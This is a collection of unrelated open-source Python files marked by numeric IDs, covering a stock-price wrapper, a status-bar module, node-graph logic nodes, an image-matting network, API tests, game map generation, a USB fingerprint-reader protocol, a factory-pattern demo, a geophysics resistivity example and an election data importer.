11588144
import yfinance as yf


class FYahoo:
    def __init__(self):
        self.tickers = {}

    def open_ticker(self, ticker: str):
        if ticker in self.get_available_tickers():
            return True
        try:
            self.tickers[ticker] = yf.Ticker(ticker)
            return True
        except Exception as e:
            print(e)
            return False

    def get_history(self, ticker: str, period: str = "max"):
        if ticker in self.get_available_tickers():
            return self.tickers[ticker].history(period=period)
        print("Please open the ticker first by calling 'open_ticker(ticker)'.")
        return False

    def get_available_tickers(self):
        return list(self.tickers.keys())


if __name__ == "__main__":
    ticker = "BTC-USD"
    fy = FYahoo()
    fy.open_ticker(ticker)
    hist = fy.get_history(ticker, period="max")  # valid periods: 1d, 5d, 1mo, 1y, max, etc.
    print(hist, type(hist))
    print(f"last close: {hist['Close'].iloc[-1]}")
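# A short extension of the demo above, using only the FYahoo API defined in
# this snippet: open several tickers and print the latest close of each.
fy_multi = FYahoo()
for symbol in ("AAPL", "MSFT", "BTC-USD"):
    fy_multi.open_ticker(symbol)
for symbol in fy_multi.get_available_tickers():
    closes = fy_multi.get_history(symbol, period="5d")["Close"]
    print(symbol, closes.iloc[-1])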
11588219
from i3pystatus import IntervalModule
import psutil
import getpass


class MakeWatch(IntervalModule):
    """
    Watches for make jobs and notifies when they are completed.

    requires: psutil
    """

    settings = (
        ("name", "Name of the job to watch for (defaults to 'make')"),
        ("running_color", "Text color while the job is running"),
        ("idle_color", "Text color while the job is not running"),
        "format",
    )

    running_color = "#FF0000"  # red
    idle_color = "#00FF00"  # green
    name = 'make'
    format = "{name}: {status}"

    def run(self):
        status = 'idle'
        for proc in psutil.process_iter():
            cur_proc = proc.as_dict(attrs=['name', 'username'])
            # username can be None for system processes, so guard before `in`.
            if cur_proc['username'] and getpass.getuser() in cur_proc['username']:
                if cur_proc['name'] == self.name:
                    status = proc.as_dict(attrs=['status'])['status']

        if status == 'idle':
            color = self.idle_color
        else:
            color = self.running_color

        cdict = {
            "name": self.name,
            "status": status,
        }

        self.data = cdict
        self.output = {
            "full_text": self.format.format(**cdict),
            "color": color,
        }
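# A minimal status-bar config sketch (assumptions: this module is on the
# Python path, and i3pystatus' Status.register also accepts module instances,
# not only registry name strings).
from i3pystatus import Status

status = Status()
# Watch a compile job named "gcc" instead of the default "make":
status.register(MakeWatch(name="gcc"))
status.run()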
11588230
from NodeGraphQt import BaseNode


class IfNode(BaseNode):
    """
    If node.
    """

    __identifier__ = 'Logics'
    NODE_NAME = 'If'

    def __init__(self):
        super(IfNode, self).__init__()
        self.condition = self.add_input('condition')
        self._then = self.add_input('then')
        self._else = self.add_input('else')
        self.add_output('out')
        self.create_property('out', None)

    def run(self):
        for port in self.condition.connected_ports():
            port.node().run()
            if port.node().get_property(port.name()):
                result = self._then
            else:
                result = self._else
            for port in result.connected_ports():
                port.node().run()
                self.set_property(
                    'out', port.node().get_property(port.name())
                )
            break

    def on_input_connected(self, to_port, from_port):
        """Override node callback method."""
        from_port.node().run()
        self.set_property(
            to_port.name(), from_port.node().get_property(from_port.name())
        )
        self.update_stream()

    def on_input_disconnected(self, to_port, from_port):
        """Override node callback method."""
        self.set_property('out', None)


class BooleanNode(BaseNode):
    """
    Boolean logic functions node.
    """

    __identifier__ = 'Logics'
    NODE_NAME = 'Boolean'

    logics = {'and': 'a and b',
              'or': 'a or b',
              'xor': '(not a and b) or (a and not b)',
              'not': 'not a'}

    def __init__(self):
        super(BooleanNode, self).__init__()
        self.a = self.add_input('a')
        self.b = self.add_input('b')
        self.add_output('out')
        self.create_property('out', None)
        self.add_combo_menu('funcs', 'Functions',
                            items=list(self.logics.keys()), tab='widgets')
        self.func = self.logics['and']

        # Switch the logic function type when the combo box changes.
        self.view.widgets['funcs'].value_changed.connect(self.addFunction)
        self.view.widgets['funcs'].value_changed.connect(self.update_stream)

    def addFunction(self, prop, func):
        """
        Show or hide input 'b' based on the selected function's arguments.
        """
        self.func = self.logics[func]
        if self.b.visible() and 'b' not in self.func:
            self.b.set_visible(False)
        elif not self.b.visible():
            self.b.set_visible(True)

    def run(self):
        a = None
        b = None
        for port in self.a.connected_ports():
            port.node().run()
            a = port.node().get_property(port.name())
        for port in self.b.connected_ports():
            port.node().run()
            b = port.node().get_property(port.name())
        if a is None or (b is None and 'b' in self.func):
            raise Exception("No inputs!")
        self.set_property('out', eval(self.func))

    def on_input_connected(self, to_port, from_port):
        """Override node callback method."""
        from_port.node().run()
        result = from_port.node().get_property(from_port.name())
        self.set_property(to_port.name(), result)
        self.update_stream()

    def on_input_disconnected(self, to_port, from_port):
        """Override node callback method."""
        self.set_property('out', None)
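# A minimal graph-setup sketch (assumptions: NodeGraphQt's example API, where
# register_node() takes the node class and create_node() takes the type
# string '<__identifier__>.<ClassName>', i.e. 'Logics.IfNode' here, and the
# Qt.py wrapper used by NodeGraphQt's own examples).
from NodeGraphQt import NodeGraph
from Qt import QtWidgets

app = QtWidgets.QApplication([])
graph = NodeGraph()
graph.register_node(IfNode)
graph.register_node(BooleanNode)

if_node = graph.create_node('Logics.IfNode')
bool_node = graph.create_node('Logics.BooleanNode')

graph.widget.show()
app.exec_()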
11588271
import torch
import torch.nn as nn
import torch.nn.functional as F


class VGG16(nn.Module):
    def __init__(self, args):
        super(VGG16, self).__init__()
        self.stage = args.stage

        self.conv1_1 = nn.Conv2d(4, 64, kernel_size=3, stride=1, padding=1, bias=True)
        self.conv1_2 = nn.Conv2d(64, 64, kernel_size=3, stride=1, padding=1, bias=True)

        self.conv2_1 = nn.Conv2d(64, 128, kernel_size=3, padding=1, bias=True)
        self.conv2_2 = nn.Conv2d(128, 128, kernel_size=3, padding=1, bias=True)

        self.conv3_1 = nn.Conv2d(128, 256, kernel_size=3, padding=1, bias=True)
        self.conv3_2 = nn.Conv2d(256, 256, kernel_size=3, padding=1, bias=True)
        self.conv3_3 = nn.Conv2d(256, 256, kernel_size=3, padding=1, bias=True)

        self.conv4_1 = nn.Conv2d(256, 512, kernel_size=3, padding=1, bias=True)
        self.conv4_2 = nn.Conv2d(512, 512, kernel_size=3, padding=1, bias=True)
        self.conv4_3 = nn.Conv2d(512, 512, kernel_size=3, padding=1, bias=True)

        self.conv5_1 = nn.Conv2d(512, 512, kernel_size=3, padding=1, bias=True)
        self.conv5_2 = nn.Conv2d(512, 512, kernel_size=3, padding=1, bias=True)
        self.conv5_3 = nn.Conv2d(512, 512, kernel_size=3, padding=1, bias=True)

        # Models released before 2019-09-09 should use kernel_size=1 & padding=0:
        # self.conv6_1 = nn.Conv2d(512, 512, kernel_size=1, padding=0, bias=True)
        self.conv6_1 = nn.Conv2d(512, 512, kernel_size=3, padding=1, bias=True)

        self.deconv6_1 = nn.Conv2d(512, 512, kernel_size=1, bias=True)
        self.deconv5_1 = nn.Conv2d(512, 512, kernel_size=5, padding=2, bias=True)
        self.deconv4_1 = nn.Conv2d(512, 256, kernel_size=5, padding=2, bias=True)
        self.deconv3_1 = nn.Conv2d(256, 128, kernel_size=5, padding=2, bias=True)
        self.deconv2_1 = nn.Conv2d(128, 64, kernel_size=5, padding=2, bias=True)
        self.deconv1_1 = nn.Conv2d(64, 64, kernel_size=5, padding=2, bias=True)

        self.deconv1 = nn.Conv2d(64, 1, kernel_size=5, padding=2, bias=True)

        if args.stage == 2:
            # Freeze the encoder-decoder for stage-2 training.
            for p in self.parameters():
                p.requires_grad = False

        if self.stage == 2 or self.stage == 3:
            self.refine_conv1 = nn.Conv2d(4, 64, kernel_size=3, padding=1, bias=True)
            self.refine_conv2 = nn.Conv2d(64, 64, kernel_size=3, padding=1, bias=True)
            self.refine_conv3 = nn.Conv2d(64, 64, kernel_size=3, padding=1, bias=True)
            self.refine_pred = nn.Conv2d(64, 1, kernel_size=3, padding=1, bias=True)

    def forward(self, x):
        # Stage 1
        x11 = F.relu(self.conv1_1(x))
        x12 = F.relu(self.conv1_2(x11))
        x1p, id1 = F.max_pool2d(x12, kernel_size=(2, 2), stride=(2, 2), return_indices=True)

        # Stage 2
        x21 = F.relu(self.conv2_1(x1p))
        x22 = F.relu(self.conv2_2(x21))
        x2p, id2 = F.max_pool2d(x22, kernel_size=(2, 2), stride=(2, 2), return_indices=True)

        # Stage 3
        x31 = F.relu(self.conv3_1(x2p))
        x32 = F.relu(self.conv3_2(x31))
        x33 = F.relu(self.conv3_3(x32))
        x3p, id3 = F.max_pool2d(x33, kernel_size=(2, 2), stride=(2, 2), return_indices=True)

        # Stage 4
        x41 = F.relu(self.conv4_1(x3p))
        x42 = F.relu(self.conv4_2(x41))
        x43 = F.relu(self.conv4_3(x42))
        x4p, id4 = F.max_pool2d(x43, kernel_size=(2, 2), stride=(2, 2), return_indices=True)

        # Stage 5
        x51 = F.relu(self.conv5_1(x4p))
        x52 = F.relu(self.conv5_2(x51))
        x53 = F.relu(self.conv5_3(x52))
        x5p, id5 = F.max_pool2d(x53, kernel_size=(2, 2), stride=(2, 2), return_indices=True)

        # Stage 6
        x61 = F.relu(self.conv6_1(x5p))

        # Stage 6d
        x61d = F.relu(self.deconv6_1(x61))

        # Stage 5d
        x5d = F.max_unpool2d(x61d, id5, kernel_size=2, stride=2)
        x51d = F.relu(self.deconv5_1(x5d))

        # Stage 4d
        x4d = F.max_unpool2d(x51d, id4, kernel_size=2, stride=2)
        x41d = F.relu(self.deconv4_1(x4d))

        # Stage 3d
        x3d = F.max_unpool2d(x41d, id3, kernel_size=2, stride=2)
        x31d = F.relu(self.deconv3_1(x3d))

        # Stage 2d
        x2d = F.max_unpool2d(x31d, id2, kernel_size=2, stride=2)
        x21d = F.relu(self.deconv2_1(x2d))

        # Stage 1d
        x1d = F.max_unpool2d(x21d, id1, kernel_size=2, stride=2)
        x12d = F.relu(self.deconv1_1(x1d))

        # The reference GitHub repo applies a sigmoid here, so we do too.
        raw_alpha = self.deconv1(x12d)
        pred_mattes = torch.sigmoid(raw_alpha)

        if self.stage <= 1:
            return pred_mattes, 0

        # Stage-2 refinement: concatenate the RGB channels with the predicted matte.
        refine0 = torch.cat((x[:, :3, :, :], pred_mattes), 1)
        refine1 = F.relu(self.refine_conv1(refine0))
        refine2 = F.relu(self.refine_conv2(refine1))
        refine3 = F.relu(self.refine_conv3(refine2))
        # A sigmoid on the refinement head made the refine result converge to 0,
        # so the residual is kept linear:
        # pred_refine = torch.sigmoid(self.refine_pred(refine3))
        pred_refine = self.refine_pred(refine3)

        pred_alpha = torch.sigmoid(raw_alpha + pred_refine)
        # print(pred_mattes.mean(), pred_alpha.mean(), pred_refine.sum())
        return pred_mattes, pred_alpha
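# A minimal smoke test (assumptions: `args` only needs a `stage` attribute,
# and H/W must be divisible by 32 so the five unpooling stages line up).
from types import SimpleNamespace

net = VGG16(SimpleNamespace(stage=1))
x = torch.randn(1, 4, 320, 320)  # RGB image + trimap as the 4th channel
pred_mattes, _ = net(x)
print(pred_mattes.shape)  # torch.Size([1, 1, 320, 320])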
11588291
import collections

from skyline.tracking.base import ReportBase, ReportBuilderBase
import skyline.tracking.time.report_queries as queries

RunTimeEntry = collections.namedtuple(
    'RunTimeEntry',
    ['operation_name', 'forward_ms', 'backward_ms', 'file_path', 'line_number'],
)


class OperationRunTimeReport(ReportBase):
    def __init__(self, connection):
        super().__init__(connection)

    def get_run_time_entries(self, path_prefix=None):
        cursor = self._connection.cursor()
        return map(
            lambda row: RunTimeEntry(*row),
            cursor.execute(queries.get_run_time_entries_with_context),
        )


class OperationRunTimeReportBuilder(ReportBuilderBase):
    # This is the operation run time tracking report file format version that
    # will be created by this builder. When changes are made to the file
    # format, this integer should be increased monotonically.
    #
    # We need to version these tracking reports to protect us from future
    # changes to the file format.
    Version = 1

    def __init__(self, file=None):
        super().__init__(file)

    def add_run_time_entry(
            self, operation_name, forward_ms, backward_ms, stack_context):
        cursor = self._connection.cursor()
        cursor.execute(queries.add_run_time_entry, (
            operation_name,
            forward_ms,
            backward_ms,
        ))
        entry_id = cursor.lastrowid

        def stack_frame_generator():
            for idx, frame in enumerate(stack_context.frames):
                yield (idx, frame.file_path, frame.line_number, entry_id)

        cursor.executemany(queries.add_stack_frame, stack_frame_generator())

    def build(self):
        self._connection.commit()
        return OperationRunTimeReport(self._connection)

    def _create_report_tables(self):
        cursor = self._connection.cursor()
        cursor.execute(queries.set_report_format_version.format(
            version=OperationRunTimeReportBuilder.Version))
        for creation_query in queries.create_report_tables.values():
            cursor.execute(creation_query)
        self._connection.commit()
11588301
import copy
from abc import ABCMeta, abstractmethod

import torch


class BaseMeter(object, metaclass=ABCMeta):
    """ Interface for all meters.
    All meters should subclass this class
    """

    @abstractmethod
    def measure(self, *batches):
        """ Partial calculation of the metric for the given batches
        """
        pass

    @abstractmethod
    def reset(self):
        """ Resets the metric value
        """
        pass

    @abstractmethod
    def value(self):
        """ Returns the metric final value
        """
        pass

    def clone(self):
        """ Create a new instance copied from this instance
        """
        return copy.deepcopy(self)

    def eval_model_on_dl(self, model, dl):
        """ Evaluates the model on a given DataLoader

        Arguments:
            model (nn.Module): Module to run the metric against
            dl (DataLoader): Input DataLoader
        """
        is_cuda = next(model.parameters()).is_cuda
        self.reset()
        with torch.no_grad():
            model.eval()
            for x, y_hat in dl:
                # Only move tensors to the GPU when the model itself is there.
                if is_cuda:
                    x = x.cuda()
                    y_hat = y_hat.cuda()
                self.measure(model(x), y_hat)
        return self.value()

    def __repr__(self):
        return "{}()".format(self.__class__.__name__)
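# A minimal concrete meter sketch (hypothetical subclass, not part of the
# library): running classification accuracy, assuming the model outputs
# per-class logits of shape [N, C] and integer targets of shape [N].
class AccuracyMeter(BaseMeter):
    def __init__(self):
        self.reset()

    def measure(self, *batches):
        outputs, targets = batches
        preds = outputs.argmax(dim=1)
        self._correct += (preds == targets).sum().item()
        self._total += targets.numel()

    def reset(self):
        self._correct = 0
        self._total = 0

    def value(self):
        return self._correct / max(self._total, 1)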
11588309
from __future__ import absolute_import

from django.core.urlresolvers import reverse

from sentry.models import Broadcast, BroadcastSeen
from sentry.testutils import APITestCase


class BroadcastListTest(APITestCase):
    def test_simple(self):
        broadcast1 = Broadcast.objects.create(message='bar', is_active=True)
        Broadcast.objects.create(message='foo', is_active=False)

        self.login_as(user=self.user)

        url = reverse('sentry-api-0-broadcast-index')
        response = self.client.get(url)
        assert response.status_code == 200
        assert len(response.data) == 1
        assert response.data[0]['id'] == str(broadcast1.id)


class BroadcastUpdateTest(APITestCase):
    def test_simple(self):
        broadcast1 = Broadcast.objects.create(message='bar', is_active=True)
        broadcast2 = Broadcast.objects.create(message='foo', is_active=False)

        self.login_as(user=self.user)

        url = reverse('sentry-api-0-broadcast-index')
        response = self.client.put(url, {'hasSeen': '1'})
        assert response.status_code == 200
        assert response.data['hasSeen']

        assert BroadcastSeen.objects.filter(
            user=self.user,
            broadcast=broadcast1,
        ).exists()
        assert not BroadcastSeen.objects.filter(
            user=self.user,
            broadcast=broadcast2,
        ).exists()
11588325
import pygame
from pbge.randmaps.decor import OmniDec
from pbge.randmaps.rooms import FuzzyRoom, OpenRoom

from . import ghterrain
import random


class MSWreckageDecor(OmniDec):
    FLOOR_DECOR = (ghterrain.MSWreckage,)
    FLOOR_FILL_FACTOR = 0.15


class DragonToothDecor(OmniDec):
    FLOOR_DECOR = (ghterrain.DragonTeethWall, ghterrain.DragonTeethWall, ghterrain.Forest)
    FLOOR_FILL_FACTOR = 0.25


class ForestRoom(FuzzyRoom):
    def build(self, gb, archi):
        super().build(gb, archi)
        # Add some random forest blobs.
        if self.area.width > 4 and self.area.height > 4:
            for t in range(random.randint(3, 10)):
                x = random.randint(self.area.left + 1, self.area.right - 2)
                y = random.randint(self.area.top + 1, self.area.bottom - 2)
                gb.fill(pygame.Rect(x - 1, y - 1, 3, 3), wall=ghterrain.Forest)
        else:
            mydest = pygame.Rect(0, 0, 3, 3)
            mydest.center = self.area.center
            gb.fill(mydest, wall=ghterrain.Forest)


class LakeRoom(FuzzyRoom):
    def build(self, gb, archi):
        super().build(gb, archi)
        # Add some random water blobs.
        if self.area.width > 8 and self.area.height > 8:
            for t in range(random.randint(1, 3)):
                x = random.randint(self.area.left + 3, self.area.right - 4)
                y = random.randint(self.area.top + 3, self.area.bottom - 4)
                s = random.randint(3, 5)
                gb.fill_blob(pygame.Rect(x - 1, y - 1, s, s), floor=ghterrain.Water)
        else:
            mydest = pygame.Rect(0, 0, 3, 3)
            mydest.center = self.area.center
            gb.fill(mydest, floor=ghterrain.Water)


class WreckageRoom(FuzzyRoom):
    DECORATE = MSWreckageDecor(floor_fill_factor=0.2)


class DragonToothRoom(FuzzyRoom):
    DECORATE = DragonToothDecor()


class MSRuinsRoom(FuzzyRoom):
    DECORATE = MSWreckageDecor(floor_fill_factor=0.05)

    def build(self, gb, archi):
        super().build(gb, archi)
        # Add some random ruins.
        ruin_list = list()
        safe_area = self.area.inflate(-4, -4)
        if safe_area.width > 8 and safe_area.height > 8:
            for t in range(random.randint(3, 8)):
                x = random.randint(self.area.left + 3, self.area.right - 4)
                y = random.randint(self.area.top + 3, self.area.bottom - 4)
                myroomdest = pygame.Rect(0, 0, random.randint(2, 4), random.randint(2, 4))
                myroomdest.center = (x, y)
                myroomdest = myroomdest.clamp(safe_area)
                if myroomdest.inflate(2, 2).collidelist(ruin_list) == -1:
                    gb.fill(myroomdest, wall=ghterrain.MSRuinedWall)
                    ruin_list.append(myroomdest)
        else:
            mydest = pygame.Rect(0, 0, 3, 3)
            mydest.center = self.area.center
            gb.fill(mydest, wall=ghterrain.MSRuinedWall)


class BarArea(OpenRoom):
    def build(self, gb, archi):
        super().build(gb, archi)
        # Add a bar along the south wall, and maybe along one side.
        mydest = pygame.Rect(self.area.left, self.area.bottom - 1, self.area.width, 1)
        gb.fill(mydest, wall=ghterrain.BarTerrain)
        if random.randint(1, 3) == 1:
            mydest = pygame.Rect(self.area.left, self.area.top, 1, self.area.height)
            gb.fill(mydest, wall=ghterrain.BarTerrain)
        elif random.randint(1, 2) == 1:
            mydest = pygame.Rect(self.area.right, self.area.top, 1, self.area.height)
            gb.fill(mydest, wall=ghterrain.BarTerrain)
11588350
from abc import ABC, abstractmethod
from time import sleep, time
from typing import Optional

from usb.control import get_status
from usb.core import Device as USBDevice
from usb.core import USBError, find
from usb.legacy import (CLASS_DATA, CLASS_VENDOR_SPEC, ENDPOINT_IN,
                        ENDPOINT_OUT, ENDPOINT_TYPE_BULK)
from usb.util import endpoint_direction, endpoint_type, find_descriptor


class Protocol(ABC):
    @abstractmethod
    def __init__(self,
                 vendor: int,
                 product: int,
                 timeout: Optional[float] = 5) -> None:
        ...

    @abstractmethod
    def write(self, data: bytes, timeout: Optional[float] = 5) -> None:
        ...

    @abstractmethod
    def read(self, size: int = 0x4000, timeout: Optional[float] = 5) -> bytes:
        ...

    @abstractmethod
    def disconnect(self, timeout: Optional[float] = 5) -> None:
        ...


class USBProtocol(Protocol):
    def __init__(self,
                 vendor: int,
                 product: int,
                 timeout: Optional[float] = 5) -> None:
        super().__init__(vendor, product, timeout)

        if timeout is not None:
            timeout += time()

        while True:
            device = find(idVendor=vendor, idProduct=product)

            if device is not None:
                try:
                    get_status(device)
                    break
                except USBError as error:
                    if (error.backend_error_code != -1 and
                            error.backend_error_code != -4):
                        raise error

            if timeout is not None and time() > timeout:
                if device is None:
                    raise TimeoutError("Device not found", -5, 19)

                raise TimeoutError("Invalid device state", -12, 131)

            sleep(0.01)

        self.device: USBDevice = device

        print(f"Found Goodix device: \"{self.device.product}\" "
              f"from \"{self.device.manufacturer}\" "
              f"on bus {self.device.bus} "
              f"address {self.device.address}.")

        interface_data = find_descriptor(
            self.device.get_active_configuration(),
            custom_match=lambda interface: interface.bInterfaceClass ==
            CLASS_DATA or interface.bInterfaceClass == CLASS_VENDOR_SPEC)

        if interface_data is None:
            raise ConnectionError("Interface data not found", -5, 6)

        print(f"Found interface data: {interface_data.bInterfaceNumber}")

        endpoint_in = find_descriptor(
            interface_data,
            custom_match=lambda endpoint: endpoint_direction(
                endpoint.bEndpointAddress) == ENDPOINT_IN and endpoint_type(
                    endpoint.bmAttributes) == ENDPOINT_TYPE_BULK)

        if endpoint_in is None:
            raise ConnectionError("Endpoint in not found", -5, 6)

        self.endpoint_in: int = endpoint_in.bEndpointAddress
        print(f"Found endpoint in: {hex(self.endpoint_in)}")

        endpoint_out = find_descriptor(
            interface_data,
            custom_match=lambda endpoint: endpoint_direction(
                endpoint.bEndpointAddress) == ENDPOINT_OUT and endpoint_type(
                    endpoint.bmAttributes) == ENDPOINT_TYPE_BULK)

        if endpoint_out is None:
            raise ConnectionError("Endpoint out not found", -5, 6)

        self.endpoint_out: int = endpoint_out.bEndpointAddress
        print(f"Found endpoint out: {hex(self.endpoint_out)}")

        if self.device.is_kernel_driver_active(interface_data.bInterfaceNumber):
            self.device.detach_kernel_driver(interface_data.bInterfaceNumber)

        self.device.set_configuration()

    def write(self, data: bytes, timeout: Optional[float] = 5) -> None:
        timeout = 0 if timeout is None else round(timeout * 1000)

        # Pad the payload to a multiple of 64 bytes before chunked writes.
        length = len(data)
        if length % 0x40:
            data += b"\x00" * (0x40 - length % 0x40)

        for i in range(0, length, 0x40):
            self.device.write(self.endpoint_out, data[i:i + 0x40], timeout)

    def read(self, size: int = 0x10000, timeout: Optional[float] = 5) -> bytes:
        timeout = 0 if timeout is None else round(timeout * 1000)
        return self.device.read(self.endpoint_in, size, timeout).tobytes()

    def disconnect(self, timeout: Optional[float] = 5) -> None:
        if timeout is not None:
            timeout += time()

        while True:
            try:
                get_status(self.device)
            except USBError as error:
                if (error.backend_error_code == -1 or
                        error.backend_error_code == -4):
                    break

                raise error

            if timeout is not None and time() > timeout:
                raise TimeoutError("Device is still connected", -7, 110)

            sleep(0.01)
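# A minimal connection sketch. The IDs below are assumptions (0x27c6 is the
# USB vendor ID used by Goodix fingerprint readers; substitute the real
# product ID of the target device).
if __name__ == "__main__":
    protocol = USBProtocol(vendor=0x27c6, product=0x5110, timeout=5)
    # ... exchange vendor-specific packets via protocol.write()/protocol.read() ...
    protocol.disconnect(timeout=None)  # blocks until the device drops off the bus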
11588359
from typing import Type


class FactoryInterface:
    def add_part(self, part: str):
        parts = self._get_default_parts()
        if part in parts:
            return parts[part]
        return None

    def _get_default_parts(self):
        raise NotImplementedError()


class GenericFactory(FactoryInterface):
    def _get_default_parts(self):
        # 'llantas' = tires, 'manillar' = handlebar
        return {
            'llantas': GenericTires(),
            'manillar': GenericHandlebar(),
        }


class MountainFactory(FactoryInterface):
    def _get_default_parts(self):
        return {
            'llantas': RuggedTires(),
            'manillar': HardHandlebar(),
        }


class RoadFactory(FactoryInterface):
    def _get_default_parts(self):
        return {
            'llantas': RoadTires(),
            'manillar': SportHandlebar(),
        }


class GenericTires:
    def part_type(self):
        return 'llantas genéricas'  # generic tires


class RuggedTires:
    def part_type(self):
        return 'llantas 4x4'  # off-road tires


class RoadTires:
    def part_type(self):
        return 'llantas para carretera'  # road tires


class GenericHandlebar:
    def part_type(self):
        return 'manillar genérico'  # generic handlebar


class HardHandlebar:
    def part_type(self):
        return 'manillar rígido'  # rigid handlebar


class SportHandlebar:
    def part_type(self):
        return 'manillar deportivo'  # sport handlebar


class Bicycle:
    def __init__(self, factory: Type[FactoryInterface] = GenericFactory):
        # Instantiate the factory once and reuse it for every part.
        my_factory = factory()
        self.type = self.get_type()
        self.llantas = my_factory.add_part('llantas')
        self.manillar = my_factory.add_part('manillar')

    def get_type(self):
        return "Bicicleta"  # "Bicycle"

    def parts(self):
        return [self.llantas.part_type(), self.manillar.part_type()]
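# A minimal usage sketch of the abstract-factory pattern above: the factory
# class passed to Bicycle decides which concrete parts are assembled.
if __name__ == "__main__":
    road_bike = Bicycle(RoadFactory)
    print(road_bike.type, road_bike.parts())
    # Bicicleta ['llantas para carretera', 'manillar deportivo']

    mountain_bike = Bicycle(MountainFactory)
    print(mountain_bike.parts())
    # ['llantas 4x4', 'manillar rígido']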
11588369
r""" DC apparent resistivity ======================= DC apparent resistivity, dipole-dipole configuration. There are various DC sounding layouts, the most common ones being Schlumberger, Wenner, pole-pole, pole-dipole, and **dipole-dipole**, at which we have a look here. Dipole-dipole layout as shown in figure 8.32 in Kearey et al. (2002): .. image:: ../../_static/figures/Fig_from_8-32.jpg The apparent resistivity :math:`\rho_a` of the *plotting point* is then computed with .. math:: \rho_a = \frac{V}{I} \pi na(n+1)(n+2)\ , where :math:`V` is measured Voltage, :math:`I` is source strength, :math:`a` is dipole length, and :math:`n` is the factor of source-receiver separation. **References** **<NAME>., <NAME>, and <NAME>, 2002**, An introduction to geophysical exploration, 3rd ed.: Blackwell Scientific Publications, ISBN: 0 632 04929 4. """ import empymod import numpy as np import matplotlib.pyplot as plt plt.style.use('ggplot') ############################################################################### # Compute :math:`\boldsymbol{\rho_a}` # ----------------------------------- # # First we define a function to compute apparent resistivity for a given model # and given source and receivers. def comp_appres(depth, res, a, n, srcpts=1, recpts=1, verb=1): """Return apparent resistivity for dipole-dipole DC measurement rho_a = V/I pi a n (n+1) (n+2). Returns die apparent resistivity due to: - Electric source, inline (y = 0 m). - Source of 1 A strength. - Source and receiver are located at the air-interface. - Source is centered at x = 0 m. Note: DC response can be obtained by either t->infinity s or f->0 Hz. f = 0 Hz is much faster, as there is no Fourier transform involved and only a single frequency has to be computed. By default, the minimum frequency in empymod is 1e-20 Hz. The difference between the signals for 1e-20 Hz and 0 Hz is very small. For more explanation regarding input parameters see `empymod.model`. Parameters ---------- depth : Absolute depths of layer interfaces, without air-interface. res : Resistivities of the layers, one more than depths (lower HS). a : Dipole length. n : Separation factors. srcpts, recpts : If < 3, bipoles are approximated as dipoles. verb : Verbosity. Returns ------- rho_a : Apparent resistivity. AB2 : Src/rec-midpoints """ # Get offsets between src-midpoint and rec-midpoint, AB AB = (n+1)*a # Collect model, putting source and receiver slightly (1e-3 m) into the # ground. model = { 'src': [-a/2, a/2, 0, 0, 1e-3, 1e-3], 'rec': [AB-a/2, AB+a/2, AB*0, AB*0, 1e-3, 1e-3], 'depth': np.r_[0, np.array(depth, ndmin=1)], 'freqtime': 1e-20, # Smaller f would be set to 1e-20 be empymod. 'verb': verb, # Setting it to 1e-20 avoids warning-message. 'res': np.r_[2e14, np.array(res, ndmin=1)], 'strength': 1, # So it is NOT normalized to 1 m src/rec. 'htarg': {'pts_per_dec': -1}, } return np.real(empymod.bipole(**model))*np.pi*a*n*(n+1)*(n+2), AB/2 ############################################################################### # Plot-function # ------------- # # Second we create a plot-function, which includes the call to `comp_appres`, # to use for a couple of different models. 
def plotit(depth, a, n, res1, res2, res3, title): """Call `comp_appres` and plot result.""" # Compute the three different models rho1, AB2 = comp_appres(depth, res1, a, n) rho2, _ = comp_appres(depth, res2, a, n) rho3, _ = comp_appres(depth, res3, a, n) # Create figure plt.figure() # Plot curves plt.loglog(AB2, rho1, label='Case 1') plt.plot(AB2, rho2, label='Case 2') plt.plot(AB2, rho3, label='Case 3') # Legend, labels plt.legend(loc='best') plt.title(title) plt.xlabel('AB/2 (m)') plt.ylabel(r'Apparent resistivity $\rho_a (\Omega\,$m)') plt.show() ############################################################################### # Model 1: 2 layers # ~~~~~~~~~~~~~~~~~ # # +--------+---------------------+---------------------+ # |layer | depth (m) | resistivity (Ohm m) | # +========+=====================+=====================+ # |air | :math:`-\infty` - 0 | 2e14 | # +--------+---------------------+---------------------+ # |layer 1 | 0 - 50 | 10 | # +--------+---------------------+---------------------+ # |layer 2 | 50 - :math:`\infty` | 100 / 10 / 1 | # +--------+---------------------+---------------------+ plotit( 50, # Depth 20, # a (src- and rec-lengths) np.arange(3, 500), # n [10, 100], # Case 1 [10, 10], # Case 2 [10, 1], # Case 3 'Model 1: 2 layers') ############################################################################### # Model 2: layer embedded in background # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ # # +--------+----------------------+---------------------+ # |layer | depth (m) | resistivity (Ohm m) | # +========+======================+=====================+ # |air | :math:`-\infty` - 0 | 2e14 | # +--------+----------------------+---------------------+ # |layer 1 | 0 - 50 | 10 | # +--------+----------------------+---------------------+ # |layer 2 | 50 - 500 | 100 / 10 / 1 | # +--------+----------------------+---------------------+ # |layer 3 | 500 - :math:`\infty` | 10 | # +--------+----------------------+---------------------+ plotit( [50, 500], # Depth 20, # a (src- and rec-lengths) np.arange(3, 500), # n [10, 100, 10], # Case 1 [10, 10, 10], # Case 2 [10, 1, 10], # Case 3 'Model 2: layer embedded in background') ############################################################################### # Model 3: 3 layers # ~~~~~~~~~~~~~~~~~ # # +--------+----------------------+----------------------+ # |layer | depth (m) | resistivity (Ohm m) | # +========+======================+======================+ # |air | :math:`-\infty` - 0 | 2e14 | # +--------+----------------------+----------------------+ # |layer 1 | 0 - 50 | 10 | # +--------+----------------------+----------------------+ # |layer 2 | 50 - 500 | 100 / 10 / 1 | # +--------+----------------------+----------------------+ # |layer 3 | 500 - :math:`\infty` | 1000 / 10 / 0.1 | # +--------+---------------------+-----------------------+ plotit( [50, 500], # Depth 20, # a (src- and rec-lengths) np.arange(3, 500), # n [10, 100, 1000], # Case 1 [10, 10, 10], # Case 2 [10, 1, 0.1], # Case 3 'Model 3: 3 layers') ############################################################################### empymod.Report()
11588380
from data_importers.management.commands import BaseHalaroseCsvImporter


class Command(BaseHalaroseCsvImporter):
    council_id = "WSM"
    addresses_name = "2021-03-30T13:02:54.918672/polling_station_export-2021-03-30.csv"
    stations_name = "2021-03-30T13:02:54.918672/polling_station_export-2021-03-30.csv"
    elections = ["2021-05-06"]

    # Have checked "Mornington Hotel 12 Lancaster Gate" and
    # "York Room, Lancaster Hall Hotel 35 Craven Terrace" closeness; all good.

    # These all have wrong locations in AddressBase, but have the right station
    # for their actual location.
    # "10033552804",  # Flat 3, 2 Moreton Close
    # "100022803552",  # 9 ST.BARNABAS STREET, LONDON
    # "100022749688",  # 50 ELNATHAN MEWS, LONDON

